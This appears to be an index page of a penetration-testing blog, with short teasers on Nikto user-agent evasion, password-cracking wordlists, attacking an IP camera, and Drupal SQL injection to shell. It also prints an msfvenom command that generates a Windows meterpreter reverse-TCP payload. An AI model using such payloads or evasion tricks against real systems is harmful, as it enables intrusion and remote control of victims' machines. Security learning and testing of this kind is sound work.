Nikto is a great tool for scanning web servers for vulnerabilities but if you look at the logs, you can see its footprint:

"Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:Port Check)"

...which makes it simple to block. To change Nikto's user agent, we open the configuration file found at /etc/nikto.conf

Read more: Nikto User Agent Change

I have a wordlist I created from a collection of wordlists I've acquired.  It's not the end-all, be-all wordlist but it's a big one, and if you have a weak password, it's in this list.  In fact, if you have a decent password, it's in the list.

It's a good list for banging against passwords to see if they are reasonably secure.  When I attempt to crack a password, I go to the top 10 most used, the top 500 most used, and then 'the' list.  Beyond that, I'm probably going to stop unless I have a different motivation.

Read more: Cewl -- Building Wordlists

With the recent talk about hijacking IP cameras for the purposes of creating a bot army, I decided to order a camera.   I'd seen this model or one like it in my local lunch place and I ordered one from Amazon.  Two days later, I got my target, a "D-Link DCS-930L Wi-Fi Camera with Remote Viewing".  Nothing fancy really.  Just a $30 camera that can be used wired or wirelessly, but apparently only good for "day use".  It will serve my purpose though.  Army of one.

Read more: Internet of Things -- D-Link DCS-930L

I needed to quickly gather the version of Microsoft Office in a mixed version environment.  Simple enough, let's grab the version of Word:

reg query "HKEY_CLASSES_ROOT\Word.Application\CurVer"

Read more: Command Line -- Microsoft Office Version

There’s a certain feeling of satisfaction when you can manually work your way through exploiting a box.  Not only that, you’ll have a better understanding of what’s really going on under the hood.  You don’t really get that when you’re using automated tools.  Not that I don’t use what’s in the toolbox but given the choice, I will try the manual route first.

I've not seen much of Drupal from either side but I found myself staring at a 7.31 installation and after some quick searches, I realized it was vulnerable to SQL injection.

Read more: Drupal to Low Priv Shell

I wanted to generate some shellcode for an exploit and I used the following command:

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f js_le -b "\x00\x0a\x0d"

Read more: msfvenom -- Specific Byte Count